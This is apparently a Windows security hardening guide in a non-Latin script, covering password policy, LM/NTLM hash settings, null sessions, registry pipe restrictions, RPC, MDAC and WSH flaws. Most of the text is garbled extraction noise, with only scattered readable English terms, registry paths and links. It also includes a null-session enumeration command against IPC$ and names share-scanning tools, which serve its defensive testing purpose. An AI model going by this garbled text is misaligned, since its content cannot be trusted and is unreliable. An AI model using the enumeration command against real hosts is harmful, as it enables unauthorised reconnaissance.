P ! #P < 6& P! & $ Y 5 $ P !& `* d* , $") S / 0_, 5 $") S / , 2' P !& P !& I _ u _ P! ] 5! Q , / P !& 3 P !& u H B 'c ,< ,6 3 minimum password age , # 4 0,< maximum " N m.1& password history u 5 ,H ) M , 6 -, P !& P! # P !& 0 ? 
, (&B LOG on 7 B 5! $? : F) ?), 0, < -, < P ! 5 " - ), . " U4 ) = G _, 5 # &1$,< minimum " 0, 5 #P< F) ? , ,F F) ? , ,F P ! e 'j 4 $Characters Minimum password length 0-14 T 9 %H ,/ ] , 5 - , b , password history 0 _ P! & 3 S d* Y password history % 1 2 , 0 < ,6 * , G %H , / $l ' ,P " 6 O * password History % 1 2, 0 < ,6 * , 6& -, ("c ) - P ? " P! & _ u] = G O* <( E 6 '? @ ? " 7, ?,< 5 , 6& " , E - Y ? # ) -, < 2 ƒ e 'j 4 )(E Y " j password age minimum , -, < = G ,< H? l '? " 7, ] L * I _ P! ] )F $ Y I P !& 0 Days Minimum password age (range:0-999) ‚, < , 6 3 d* 2' Minimum password age 0, 6 ) [ (&B -" F ? & )" " , u # " % PH ] , 5 ) YB* F) minimum password age < # " %P H ] 0, 5 - P - Y Maximum password age (range:0-999 days) 5! Q , / $l ' $l ' 5K ) 5 GX) u ?# 0,< 5! P !& 2 d* P !& P! & = G T 9 %H , / : ("c 2 ? T 9 %H , / 0 # MR / P !& 0, < ? " 0 ' I F) 7 ) X $ Y 6 " 6 , ? 0, - 4 : 2 , - ") , W L3 )S 0 ' $ P! & F) 'Y< ) d * : , $ #P< 7 !89 6? " 2 " 3 In the domain Store password using reversible encryption for all N& " - Y P! & " K6 ? , K , @ '( E N& W L3 " ("c 6& P !& ] 6 7 $-, < DY/ 0 P! & 6 @ I - 3•0 15G P! l' P !& " - 3•$ ) ) K6%# ) 4 -, < K & $, 5 6& $, 5 - Y - Y ?, < T G'2 " - Y 0 users $l ' 2 " 4 ? 5 m .1 d* 5/ 7 # $ : I P ! 2 7 , 5 ) ) 0_ I - 3• ( &1 I ,G 0 6& " 6 P ) " %51 E I ?@ " ? K6A) " 6account " F$ 5 - Y ? R4 # 6 -, `4 a P ! b3 n 9 from Command line Promp: Net User Username/random 6) 56] -, ` 4 ) ' L I P ! P !& 6& - Y 6 P GH ) ? & cracking ("c _ P ! P ! ) -, < I5 S ^P 6 6& F$ P ! , @ '" , < ? , " ("c " E S ("c " E S 6& $l '%5G1 P account _T 9 # $l 'A) 0 < 5 )6& *] - j 5 .Y Service accounts Y &5 - <\ X 6 ^P A) 2 Stand alone ?), " U 4 0 < - Y cracking • F " GX) 2 0 P ! C, E 5 $? " ) l '7 B 5! crack ? @ $ ?@ P! ) -, $ 6& 0 ? @ \8 9 H?@ 3 I N ? " (, ! 0, < / G ;3 A $? b 6& 3 ?# -, < - 3•?@ SB g 0 <- v 4 6%5G1 ) C 3 0 <I $? DY/ : ? @ DY/ (,! 7 ? K6% ' I ' DY/ ) ,< A" @ ? 3 = GX $ K6( 4 2 ` < $ ) [ >/ ?@ " , < )W 3 ("c ) P ! ) 6& -, < % L , Y 5! 
( 5 -, ("c 2 K ("c 6account F $, 5 6A" @ ? <• (E MR/ 2 1E 0 6 N4 0 ^P 5 6 $ 5 - Y 6account &5 ) : , P account ) 0 2 F ? , GA ,account #P< ) 0, < 4 ' 0 K B 5F " $, P !& " %P H)S E $6 ) H 6 F) ? N ,< P !& 3 ("c P !" “ and must be changed Your password has expired O* $, < H,, e G A" @ P! & 2 < (,! $ N 6& ,K A 456 • 2A N +A ,P 0 ' ,6 3 B . P ! crack ("c "] $ P P! ?@ ?, 6& & $_ E 6 % < P! I l '7 B 5! $ O * - . W L3 6& F ) \ X P !& P! F ( E -,< DY/ 2< ( E -,< DY/ 2 < -,< +H ) F $ 6 0 K6A) " - Y $= GX , 5 ,H ) #. %5G1 6& . 7 $S 0 ? P! craking P !& B 1 I K6 & N : ^P 6account ? )&' I 1 -,< , K ) " - 4 $,< W 3 K62 ) 5 ?@" - Y 0 ?@ ? (N " K6account MR/ ) ) X 3 "% , ?@ , P4 ' account MR/ I %L 0 S , N) )% ! b - Y & $ F P 4 -,< K -, < K 3 - Y $, - 5 V I : G 2N P 7 # " - Y 2 P$ % / ? 59 62 ) " ? " # 54 :&N 0 1 6 „ 1 # 2 3@ 56 1 P! 0 )? 3 - + $S&• -)8! ? $ P! & 6 & " $ #P < 6U ) P !& , N $S 2, 0 0 lan &N F 6, & 2 LM A9(? 2A& * B • G ;NA 8 _Version2] Ntlmv2 NT LAN Manager A) " - Y Manager 0 $, K I ,6 3 6(& # P ) I #. N& " - Y E , B $ " T),F a,6 ? $, 5 T - 5 M 9 $NTMV2 v 4 |j1 LM pqqq ) NT "), ) 6=G l ' BH Rgistry key Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControl Set\Control\LSA Value: LMCompatibilityLevel ValidRange: 0-5 Default :0 f4 Y 2 , , )d* , K A) ) \ $l ' Q 4 • a,< 7 # " & 6$NTLM ) LM A) h v 4T 0 < 5 - Y NTMv2 NTLMV2 7 # " - Y NTLM , K A) h T …p NTMV2 , K A) h T …s LM , K ;! DC …x ) -,< NTLM ) LM , K ;! DC …r 0 ' R4 NTLMv2 , K C ' …w 0 - Y ? 0 5 lan Manager , K i: 6 pqqq "), ) LAN ^P 0, #4 75 I , #4 ("c : $ Manager authentication level security: Network I ) SP4NT "), ) $ 6 -, < S L ?@ " , G ) ? , U) LM hashes T " 5 ("c 2 5 ,H ? , U) NT Lan ? E 4 , 2 6& " - Y 7 ? I K6 $ NTLMv2 , 5 # ‡ NTLM " - Y : # $, < f4 , Controllers Domain I $l 'U ) 0_ #P < ) (&B P LM I BH " - Y ) Y _ {† "), ) hashing 0 5 T5! Domain Controller 0 ' 6 SL " U4 0 0, < $ 5 NTLMv2 " - Y u? ) 6 , 5 - Y Network Client Microsoft - 56 $, 5 ? 
O* S l ' N 4] ' LMCompatibility ( , ) Directory Services Client ?@ ) (5 NTMv2 " {† ) {r "), ) e 'j 4 7 I 2 ) $ Manager authentication Level LAN 0, ) ( ,H ? @ " Security Options ) Policies Local O* S pqqs ) XP "), ) ) , I ) T G'Policy Local Security & • # & XP ) pqqs $pqqq "), ) -,< K SL , , ) {r "), )] : I Manager,version LMCompatibility Level authentication level Manager ("c 0 ' U) Send NTLMv2 Respone only\Refuse LM I ) ), . T 5! $ : MR / ^ P B %K & 2 ? @ " - LM hashes E ? 5 TG' g 1 )- -, < SL ? @ ) (E 2 l '7 B 5! T $ " ) ,< ,6 * Value on next 0 ? , *& • LM hashes & # ') # C ' F) ?@ " - Y XP ) pqqs $ _ -, < E l ', B Windows 2000 Domain Controller ) 5 - 3•& LAN - < # 2 6 E , B0 I 3•$ #P< I ) SP2] 2000 "), ) ,G 25 # GLmhash + A 1 A7T " ) SAM 0 ?# Local Security Poclicy , # 0,6 $Lanman hashes $,< E $Xp ) pqqs "), ) & ? 5 T G' ? 0 password change Lan manager hash network security: Do not store ("c : 2 ) Local Policies 6 $l '7 - < hash LM " 0 ' # 2 # " I M ,6 ) T G'Policy Local Security & u T5! " U4 0, O* S Security Options ("c 0, < +H ) [ $-, < E 7 u -,< " , - , ,F hashes LM E W L3 P !& - 3• : ) ("c Y7 N 4C ' $-,< K 6A) F LM hashes ) 0,< , 6 3 MR/ $,6 Rgistry key Hive: Hkey_local_Machine Key: System\Current ControlSet\Control\LSA\NolMHash (E u 3 6 & GSAM :(A AVL + A A ,WA A & 6A) " hashes " P ! A A *& • Hash A AU;( + SA A 0 6& ? )@ , $ P ! & cracking I a, 5 4 " I 2 , a #P< " P ! - Y 6& = a 2 ] #P< F M, 6 - Y ethereal 0_ 0-,< ˆK 6 #P< " - Y #P < 67 MR/ ) d * I , 1' pqqq ) NT4 "), ) b < ,6 3 % '" - Y _ C:\Winnt\System32\ Config F) ?@ Q# ?# "C ' SAM % '0,< -,< " , - ? 0 )@ - 56) ), . Controllers Domain C L3 @ 78# 3 I & Repair F ) Lock "), ) N % ! , & 9 i: j &') SAM % ' Q # " ("c : l '% '0SAM % ' Q # $l '% '0,< 2< 6& " ? 5!] SystemRoot%\System32\Config C % ! 3 N 4 6 Backup I # &' ) -,< ' Backup 7 !89 " 0 a 5 - Y " 7c " ? 
B5# 7 !89 R3 - How to Disable LM Authentication on Windows NT - How to Enable NTLMv2 Authentication for Windows 95/98/2000/NT - New Registry Key to Remove LM Hashes from Active Directory and Security Account Manager E ! " % &# $X Internet Explorer (IE) 0 ' ) # ?@ "), ) ( '784 N ( N ) Patch 5 $, R4S @^ h IE ? 6T R4 S @ ^ 0 T#< ") 85/ , 6 ) B . % $ 6 K6 * ,6 3 " 5 IE ) ,G F) "), ) ) K6 6 ) SB g " - Y 7 ) X, < 0 ) SL & + 2 , ,F ) 2 3@ " 6) 0 < ,6 3 -,6 ) IE W F) IE < L3 ("c Windows U ) 5 6 $, < -, 4 R4 S @ ^ - Y "), ) ') # 6 &'( / $IE ) , F) ?, 0 < ?@ ! ". /0(123& ) # 6Patch SL # http://windowsupdate.microsoft.com/ ? 0 ( E " ) HFNetChk " ? , F) ' Update Windows U ) ) # Analyzer Microsoft F Online ) HS @), , e G , < T G' 0 5 F) $, 5 C 5! ) SL ,6U ) $U# +, -, < - < 0 < ,6 3 ) # ) - *1 6, ) 6) Z '?@ , $() * 7) Y ) )Y ?5F T @^ 6 Y $T G' 6 6% ' R4 S @ IE $O) 7 Y. a I . # R4S b l ' R4 S @ ^ Z F $0 6* , 63 -, < ( E ? 5F ) MIME \ ) ,6(E 0 $IE ) IE -, < SL , G 78 5/ ? $"), ) U ' ' & $ B . -,< SL e 'j 4 O) ) -, < S L " ? 2 $, < -, 6Patch TG'update 0 5 - Y Baseline Security Check Qualys Browser a I _O) 0 5 - Y $IE GX) P ) F &1 @ ,< 6 &] B : )c ! " %& IE ) Y - Y ) 2 -,< - < R 4 S @ & IE 1 ) )- 5 I # B ! 0, Z 0, < 0 0, K5 ( N ) Z - Y % H) W L* S @^ ‰8 ;! ("c 6patch ?@ $ 6Service Pack + F Patch 2 3@ 0 5 SL ) ("c : & N 'X IE + i. %/ , ? #4) I $l ' 3 7 # " % 0, * P R4 # IE ! 5E IE GX) ? ?@ a 5 TP Inetnet 6% bP & O* • Custom Level ? 5 T G') Security Tab & O* • 4" - Y Z T G'$ " n 9 " Options Tools ("c 2 0, a <( E %1 , $IE " F) (,! $ $-,< K Service Pack 2 3@ _†pp{pr] 6Patch ("c 0 5 - Y Explore 6 SP1 Internet a h @ " ? 2 F j< * - Y 5/5IE * 4$ 0 6Patch ("c F SB g W L3 2 $j< l ' * - Y IE6.0 * " # ' 5 456 123& R4 S @ ^ 6* K P 785/ Q Zone. R4 S @ ^ n. $ActiveX Controls ) Scripting Active 6@)7 I l ' 6% 4" - ) ?,< Prompt for Allow paste operations via & $Scripting j * • Clipboard n 9 " ("c script TG' g I . 
W L3 5 Active Scripting 0_, 5 - Y $l ' % N4 - < # 2 4" 6 Download signed Active X Controls O) " Prompt O* ("c] 0 < ( E " ,G & O* $ • Download unsigned Active X Controls Initialize and script ActiveX Controls not Disable & O* • Disable & O* • marked as safe & $Microsoft j* • & $Microsoft VM j* • High safety for Java permissions High safety for Java permissions N 4) )F 6 B 4 i. F I ("c 0 across domains Access to data 0 TG' g Cross-site scripting 6" E O* $ & $ Miscellaneous j * P 785/ " G5 ^P • I 5 $sources ! " % &# R Windows Remote Access Servies #P< ^ P )Y -, < K „ 1# 6% ^ 6 „ 1 # ) 7 # $"), ) 7) Y 4)7 # " -,< K 3 6 K ) : 2 0, 5 , 6V < ? `56 $_PRC] 62 ) E 3 ') #P < 6 BH ) 7 # 0 3 " ) 6 '2 < + 2 F + GX) , 5 ,H ) F ? & & 3)- 3 , " ) " g@ (, ! ) l '=GX ^ $? & 6 '? & # l '% < TP, " 7, F - ) 3" + V <S , 7 L ?5F b ?@ " ?# K % b <R V < ) CIFS File ) - " 4_ (E , b ?& ) K6 * _ - < ) F "), ) ) ,5 I ] 6h) ) ) 6 / 6 ! DY/ - Y " W L3 ) P Q M ,6 l '? 6% ' T $ #P< V < S ? , _ ) #P < , # 4 (, ! % 1 , B . # 4 (,! % 1 , 1 )- 3 7 / pqqw T " 2, ? & " - Y $ #P< V < i. 0, < S 7 B 5! ( E ?# $l ' 6%# ) 4 0,< CH ] 0, 5 F 7 # " % '" - Y Z - $, l '+ System Common Internet ) " 456 Q -NETBIOS H #P< #P< ? & 7 B 5! " - 5 6 '$?@ P l '(& # (SMB Block Message Server)] %# ) 4 ( ,G 7 5F 0 ! " - Y ) 6 '& ^P K6 , 1' ) % 'V < ?# $"), ) % ! -, < <R V < 0 Logon NULL 6i :< 8 Y ^P 6 ) - ) "), ) 4 6 3 $l ' 5/ ) K #P< 6%# ) 4 Q Anonymous $7 B F $NETBIOS #P< ) - " 6* 0, 5 0, 5 ("c % 4 $ #P < E 6@ ) 6 , 1' 3 ) 6 I] 6 ' #P< ? ) F + 2 < ) ?, 3 ?# $ < ( E #P< -, < <R V < + 0 ' ,6 3 j6 . " : 7, , " " 3 $ 3 ? #56 <R V < P , )- Y Z _ 6% ' #4 # 0 :3 ) Logon Anonymouse Null Session 85! $Session C P !& )( ] l89 $_ 13Null Session " 0 6U ) 0 - Y 6 ) "), )NT ? G $Local System account E n 9 " #P< ? G $bP 7 L 6 A R4 3 : l' 0, 5 Null Session H$ $ P H ^P Local ,K 1/ 6* I5 Z F 0 * ?# $ " %1 , 1 ), 5 5 6 ' u ? 
# $pqqq "), ) " % P H 6* KN* 4 Session Null pqqq "), ) 2 ) 6' , _ & + R 1 : ${†"), )CE $NT $pqqq $ME ) XP B B & ) 6N , , # 4 $ &'( - P< 7 5 I H 0 ) - Y $? , 6 native A R 4Null Session ) 6 $? )Z F B . 0, 5 %# $ 6-) Z F computer account Local U ) H ) 6 'pqqq "), ) " % P H ] <+ I5 ) pqqqLocal System account ) # 3 7 !89 j 5 null Session "), ) 0, 5 6U ) 6U ) Computer " $, bP P! ?), -,< E 1 6, F) I5 ) ? @ ) 6 '? 5F ,6 3O * Z , < -, 6" E 0, 5 b E !89 E - Y " $ P 75 I ) - " 23 , - 9*5 ) l ' GX) " - Y Z :&27 RPC Remote Procedure Calls:[ " ] "), ) 6* " , GNT $pqqq $XP (& # " 9P I nter process Z F T/ ) - " ) N ?& 0 ' 7 F , 3 ' ) 3 - *1 , 0_ B . F \ " 785/ ( E 3 H F - Y ) ,G 785/ ? 0,< H F 2 Blaster/Msblast/Lovsan ) 6" E - 5 ] 0 Nachi/ Welchia " - Y 0, 5 H $? & $l ' R 4 S @ : " - Y ) - " ?& 6( 2 " _pqqs $ 0, - - Y l ' R4 S @ : " Dos R4 S @ ^ ! ^P $ RPC0 ! ") * 0, +, H,, 2 e G + %K bP : R4 S @ d * 7c #< d * I5 % 'V < U ) ?# F ? $l ' 5 & - .NETBIOS T L. &'Afentis security 0,< A8 " %P H 7 !89 #B 5! - . " )@ +5F I 5 6@ 2 a 0, 5 $ -,< h PH NAT ("c NETBIOS $, L W L3 : ,G " ? NETBIOS - Y " Netbios Auditing Tool ( -,< K ) W L* ^ 6* ! ". /0(123& 0 5 NAT 7 5B " b "), ) 6 B / $ ) #) " ) (E - Y $% ' h @ " http:// www. Afentis. Com/resources/win32/nat - Y 0 5 " , v2.11 Legion N ${† ) {Š "), ) ? % 'V <Legion b " , -,< K Rhino9 #P< V < $pqqq "), )? Checker)Security Fridays Share ? , ) {† ${Š 6* ] "), )CE S @ d * 0, U) 4 * GX) 5 - Y I5 _ SPC)Password % 'V < ? # $l ' 2 3@ ] I5 0, 5 - Y _ R4Level password share "), ) ? ^P NT ? @ ) ] sp4 $pqqq $_,< -,< SL XP Baseline Security Advisor S @ ? & W L3 : R4SMB 0, 5 l '%# ) 0, 5 B . ? & "), ) ? ) ? 5 M 9 ? $pqqs ) ("c A & R3 )- Y ( ,H $ R4 S @ " - Y Share net , 5 -,6 €" ? " , 6 ) ( E ) - " ? & NT $pqqq $XP 0 $l ' <+ ^P 6' B5# 7 !89 " , pqqs ) 1$ b3 n 9 " ) 6@ ]Net Share/ $ 0_ 5 - Y 0 -, < K ' j $ <+ <+ T 5! ) ^P 6( E ],< 7 !89 S a ‰8 - Y " 7c ) 7 < "), ) <+ W 3 <+ … )% ' ^ P $ : u !89 1 2 6( E " %P H$ F) 1 ) I 5 0_ < ( E " ? 
u 1/ + 6@C 8 <+ 7 ?, ("c 2 W L3 L 7 u u $-,6 $ I - .… : " ) - 3•… 3 6" E MR / P !& DY/ ) -,< - ) 6 ,1'XP "), ) < ,1' V < ? 5 TG' g - .… "), )XP V < "), ) a 6" E 6* , N ) 6% ' " 6 - .…NTFS <+ ^P e 'j 4 6" E "), )…NT "), ) ) pqqq "), ) $XP S L " % P H ] SP1 " E $_ "7 L Everyone 7 L ) Control Full0, < "), )…XP ? @ ) SP1 " E -, < SL Everyone ) $ 7 L Read0,< "), )…xp ( e 'j 4 7 L Sharedocs < User s/ Documents and settings/All C: /Documents " E ] _ Everyone 7 L ) Full Control0,< d * H + Open Share " GX) I5 + " ? "), ) GX) # 0_, < I5 $ F 5 ?N ) 25 $?N SMB 6* 5 6 <+ ^P R4 S @ ^ - Y % H ?@ : d * 3 ], < File Sharing %K ^ Gibson Research Corporation " ? & " 6 N 4 SB g bP 2 I5 ) R4 S @ 0 5 ' j 4 6& a 5 - Y …Nessus0 ) - " - Y I5 - ) -,< ( N $?N j 4 & a …Winfingerprint N 4 aWin32 Host/Network Enumeration A A : + A! A". /A 0(12A 3&Logon Anonymouse 9A I 5 G?" \N( Anonymouse Logon R4 S @ null Session0 K5 TG'$ b3 n 9 " ) " $ " - Y From Command Line Prompt: C:/>net use// ipaddress/ipc$""/user:"" < +P TL ? G ) -,<anonymouse P ! & Null $l ' -, < 'N I System error 5 F " U4 # ' F Ipaddress d * ?@ ( ] user/:” )_ hidden interprocess communications E ] H $l ' R 4 S @ : e G & @ IPC$ E ;! $l ' P 4 $l ' )- F) (, ! -, 6, 2 (E F " U4 # $ 0_ n. I 5 ("c " E 0 < ,6 * =GX 2 % R 4 S @ -, 6, ]% P Hj * -, < 'G Winfingerpirnt d * $+ A R 6 &'( 1 j 5 .Y " 0 ) Nessus ) , 63 & _Null Session0 5 - Y $ I5 ? A $ <- : A A A + A! A ". /A 0(12A 3& NT NTRK)(Resource ( regdump. K F % ' % <$ ' ) # n 9" "), ) ? & NT h @" ? E b3 + & : XP % -)8! 0, 5 http://www. Afentis. Com/top20 0 5 - Y & _ ] F #P< ) 6& K<@ I5 $ 6 ! ". /0(123&RPC ] ' ) # Secutity Analyzer I 5 A) 2 h @ n 9" ? l' 9 Microsoft Baseline $l ' 0 -M2A " - Y 0 - K $ R4 S @ d * http://www. Microsoft. Com/technet/security/tools/Tools/MBSAhom. Asp0 5 ! " ' 456 123& DY/ - .NETBIOSa bP 785/ % - Y ^ - ) pqqq $NT ) $ B 3 Patch-cheking , hotfix ( 2 % H$ 6" E TG' g 7 L I "), ) ? & $l ' & n 9" h 7 , , j6 I5 ,G 6 #6 " ? : 2 a 5 5 ?@ " - Y ) X # sharing ? 
5 T G' g 0,< CE ) {† ${Š "), ) ? , * ? G User-Level share access control 7 U) 4 L $, < NT "), ) Dmain " 0, 6% 'V < 0 0 ) FTP n 9 " ? # $sharing " - Y C ' ,6 3 sharing $S ?@ N n 9 " b' -,< <R V < &1 P !& z 0, K5 , 1' 6 , 1'? ? & 7 ) X7 2 , 0, 6 ( E " E ) -,< , K ? 0 #4 sharing ? 5 T G' g ) HTTP R4 7 + $S ? & , $ < +P " - Y I5 Sharing ), . C ' $7 ) X 7 )(E ,1' : 0 <R V < h @ sharing ?# ? ),. 0_,< ("c R 1$ ?@ " $ E < $ DNS F) , -, < K u S X j &' I 5 E u a 5 - Y " : : 2 6 !89 $ 1 2 6T 5! " % PHBackup 7 " ?# $7 ) X Restore " ? ] ,E ?# ] 0 5 ip # -, < ' 0,< < F) ? @ _ !89 + "), ) NT "), ) F ? 5 Restore ) $j F i ) $ Backup - . 4.0 F ? 5 Restore ) j ) $ Backup - . F ? 5 Restore ) j ) $ Backup - . pqqq "), ) ) XP "), ) pqqs "), ) "), ) 7 L , " Null sessions " # & K6 2 NT Domain Controllers $, -, < , 0 Windows NT Domain pqqq "), ) " % P H 6* ,63 3" 7 9P #4 I5 pqqs|pqqq "), ) ?# ] -,< Z F P ) 1/ b 2#5 I !89 ?& ? ,< < F) I 2 F Restrict Anonymouse 9 $ pqqq "), ) 6 $ • " - Y $_ , 5 5 1 ) j6 6% 4) 6 # h ), . T 5! a 5 - Y " 7c " 5 $ , I5 0 MR / ,6 3 ) 7 !89 R3 null session " ? : $ ! 5E Anonymouse ? "), ) - Y ?5F T@ -, % / - 0, - Y pqqsRestrict Anonymouse , $ 6 ' 7 !89 K ),. T5! NT Restrict Anonymouse "), ) F , " - Y - . pqqq F a 5 - Y " , Restrict Anonymouse 2 #< ;! F Domain 0 6, B "), ) ? % bP 0, DY/ - . 6" E ) $Service Pack 3 E $l ', , " ()&17 SL " u : E u ] ,E " ?# $7 ) X 7 " ) 7 $ " ? -,<restore : ) E -,<Backup ("c R1$ 0, < < 2 "), ) I5 / )NT 4.0 E 0, < 2t5: $ 6T5! " %PH !89 + 3 u( E " %P H 3 !89 $ 1 2 ?@ " $ a 5 - Y 2#5 Trust pqqq "), ) E K I 5 Restrict Anonymouse 1 " ? , $ K " T#< E i NT 4.0 "), ) E ? 5 Resroe ) $j ) $ Backup - . pqqq "), ) E•? 5 Restore ) j ) $ Backup - . " ' F) ? @ _ ) XP "), ) E ? 5 Restore ) j ) $ Backup - . pqqs "), ) n 9" a K5 E TP ), . T 5! E ,B E I5 I 5 a #P< " %/ ), . 
$ #P< create the following Registry key HKEY_LOCAL_MACHINE\SYSTEM\Current controlset\control Secure PipeServers\winreg Description:REG_SZ Value:Registry server - " " F) K 6) j 4 7 5 I $"), ) SL ? " 0, 5 $l ', B e 'Access Control List ] , 6) " %/ $ a K5 )? d* 3 $l ', B ,< B E ),. T5! E 6" E ) 7 " , Backup Operators ) 6" E ) Regedit32.exe ] I5 , B E E F a, B 2 ' F E F HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet\Control Edit n 9 " Add Key a " Enter the following values: Key Name: Secure PipeServers Class: REG_SZ a, B 2 ' F E F - H _ pqqq "), ) TP _ regedit.exe ) & O* z 0,6 HKEY_LOCAL_MACHINE\SYSTEM\Current controlSet\Control\Secure PipeServers Edit n 9 " Add Key & O* a " z Enter the following values: Key Name: winreg Class: REG_SZ a,B 2 ' F E F HKEY_LPCAL_MACHINE\SYSTEM\Current ControlSet\Control\SecureServers\winreg Edit n 9 " Add Key & O* a " z Enter the following valuses: Value Name: Description Data Type: REG_SZ String: registry server a, B 2 ' F E F HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet \Control\SecurePipeServers\winreg 0 Permissions " E Z :! ) Security ) B $ winreg O * I5 " E )? 6-) ? 1/ 2 0 5 'X ( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor 0, K5 ", - E " $-,< F) 0 5 E # 1 u ,LH -,< - < B / 2 3@ ? ^P I "E ? ) i $,< < ), . T 5! a-,< , K ) - " 6U ) : " ("c 6" E " 3 i: ? , B ? @? 5 d* AllowedPaths ^ ] 5 = Machine G 2 $ 0,< E < TP, $ account name U ) 1 Z F T/ winreg T5! (,! ,B ),. T5! P F7 [ , Directory Replicator ) service printer Spooler : ? )&' # ^ I 5 "), ) , # 4 3 6, B )$ ), . 
) Users a_ Bypass the access restriction:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths
Value: Machine
Value Type: REG_MULTI_SZ - Multi string
Default Data:
System\CurrentControlSet\Control\ProductOptions
System\CurrentControlSet\Control\Print\Printers
System\CurrentControlSet\Services\EventLog
Software\Microsoft\Windows NT\CurrentVersion
System\CurrentControlSet\Services\Replicator
Valid Range: (A valid path to a location in the registry)
Description: Allow machines access to listed locations in the registry provided that no explicit access restrictions exist for that location.
Value: Users
Value Type: REG_MULTI_SZ - Multi string
Default Data: (none)
Valid Range: (A valid path to a location in the registry)
Description: Allow users access to listed locations in the registry provided that no explicit access restrictions exist for that location.
DY/ - .RPC bP %K % SL : 2 A) 2 Windows Update ? 5 TG' g #B 5! ^ P Patch b I ,G ), . T 5! 6MBSA -, < K 6A) : )RPC h @ " - Y http://www.ntbugtraq.com/dcomrpc.asp ("c 0, < , Y , - . : ),. T5! #B 5!RPC 2 U4 ) (E # ?# Patch B 5! $ "), ) U ) g 0 5 T 5! bP ) ? 5 TG' g " 3 I B 67 7 ) 4 ? ' <, 0 F) 2 # 2 " ;! , u, ? @ $ #B 5! . $, < ,< : - < 3 2 F) ) $ 4 " ? 59 " ? 5 RPC ^ ^ Š{s ) ‹‹Š ) ws{ ) wsŠ ‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8 ) "), ) $ R4 S @ : a 5 - Y 67 " : !89 + E 4 ] "), )TCP 67 4) _ ),. T5! - . K<@ I -, < - <Windows Remote Access Services " ? Security Bulletin Service & Hotfix Microsofts editor windows server 2003 Registry) XP "), ) " - Y - . access: Remotely accessible registry paths and subpaths Network Server 2003 Security Guide windows
! " % &# 08 Microsoft Data Access Components (MDAC)
MDAC S @^ !89 " - Y R4 MDAC ?5F bP 0 " , -,< ' ) 6, " $l '785/ 0, 5 - Y _O * 7 a 5 - < "2 E B % !) " H # $"), ) : ? ! E % <$ 3 2 6* " ,G ,G 785/ ? ), Z F] 6 # ) " - Y RDS I ] 5 ,H 6 „1# " 3 M ,6 1 ) ,< < F $ R4 S @ ,G % c , -,< K 7c L.
, ,F %K F) ) _ overflow buffer - 9 *5 F 5 $ 0 ", RDS 7 5B " MDAC $ " S Remote Data Services 5 , H * H ) - " ? 0, 5 Z F $ , 7" $ =GX ) 6" E - 5 78# ) 6=GX 0_ ?@ B F * ] s) Š MS Access !89 6 GX) 2 3@ 6 T 3" 6 R4 S @ $_ 6 ' ,G 7, , " j ) -,< 3 < % 5 ,H R4 S @ B % c " $ 6 0,< Microsoft jet " ) j &' ] I 5 ("c 7 , )- B . 7 L =GX - 5 l '=GX Microsoft jet Database Database Engine " -, < h PH 6 F) 0 S : $l ' -,< K ) , # 4 (,! )- # (N F ) 6, " 0, -, ! 785/ l '=GX " - Y 3 785/ " # Buffer Overflow ? ?5F (E %1 , $ : - 5< MDAC0,< P 3]21 MS03-033 * _ 5 R4 S @ : 2 0 MDAC -, < - < ?@ $pqqs "), ) ' ) # $() * "), ) IIS Q NT 6 ) T)J) $ RDS ) j< l' 6* =GX SQL " MDAC 0, < 6* ] SP2$_ Q$ < l ' R4 S @ : + ‹) q $,< -,< SL w)Š ) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ ) * SQL Server 7 ? @ ) ?@ ) , 56SPI $_ K6 -, < SL , G ) Server 2000 -,6 N 560, 5 - Y "), ) ! ". /0(123& "), ) ) % ' F) W L3 NT 4.0 - 5 IIS SL # ) * $,< -,< msadcs.dll” % '] < ( E ("c C 5! l ' c:\program files\Common files\System\msadc\msadcs.dll h @ # 0_, < 7) Y ) " , #4 F 2#5 l 'h @ $ patching 2 ( N $,< l '% '% < I % ! 6 ) 5 ,H 7 K &F " 6 @ 6 &'( I5 0 < , 6 3 F) 7 0 H$ : $ (E ? HS @),, e G $-,< - < ("c 3 " ? ( : W (N W L3 MDAC- 5< R4 S @ ^ 2 0 5 - Y L3 ("c ( ,H F b < S )(E R4 S @d * 2< ) 0 -,< i 3 -, < SL 6 &' 456 123& : RDS $Jet " ? ? @ h @ http://www.wiretrip.net/rfp/txt/rfp9907.txt & DY/) I5 & " ! " %& 6=GX ' ) # Windows update $l '? # 0 5 - Y $ 0 5 ,6 3 6 &'( MS03-033 21 " ? - .?@ R4 S @ : 2 % _ B ) i.L - . ) ' ) # P 3]2 1 2, 0 5 - Y : 2
http://support.microsoft.com/support/kb/articles/q184/3/72.asp
http://www.microsoft.com/technet/security/bulletin/ms99-004.asp
http://www.microsoft.com/technet/security/bulletin/ms99-025.asp
http://www.microsoft.com/security_bulletins/ms03-033.asp
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-033.asp
http://support.microsoft.com/default.aspx?scid=kb;en-us;82378
? ver * $l ' 2 3@ 0 =GX 3 $†$p MDAC Z I MDAC * !89 6 F MDAC bP ! ) h @ n 9" ? 
http://msdn.microsoft.com/library/default.asp?url=download/list/dat aaccess.asp " ? 0 5 : 2 0 5 ' ) -,6 windows update - Y & ! " % &# 5, Scripting Host(WSH Windows) WSH ) 4 # ) #B 5! j &' I 5 6* „ 1 # 0_ - - 5 6, " - Y N 4 -, , 6 # U l ' 6% $"), ) 4] , 5 -,<desktop 0_ 5/ ) K f4 * F $% ' I ], „1# $ K "), ) % !VSH ?# $ ?@ " g@], F -,< K ? G ) K "), ) 7 B 5! ? n 9" C 5 , - 56{† "), ) b "), )VBScript P 21 ) ) ) F " $l ' „ 1 # 0,< ? - 5 IE ') # Z F 4 6' 4 # ) - ? 5 ,B ) n 9" ) 4 # % ' 0_ # ) #1 ZF -,< < VBScrip 0, b " 3O * M 6 7 % 3 % '\ vbs,. Vbe,js, .jse0) 0wsf 6 '$ B ;! I 5 $, , & WSH O G 0 ) X ! B % !$ ILOVEYOU , ] J)WSH( ) ) - ‰ : " U4 6 K6( F ?# $S T)J) # <R ? 1 _ ) l '( 2 , 0, - 5 - Y ? G $jscript 6" E i: $() * WSH K ) # - 56 ) #B 5! j &' I ) F " $l ' „ 1 # 0, < P IE * „ 1 # 0_ WSH - 4 -, ) Z F U) n 9" -,< K ? ! ?@ " g@ ] , E $% ' b „1# $ 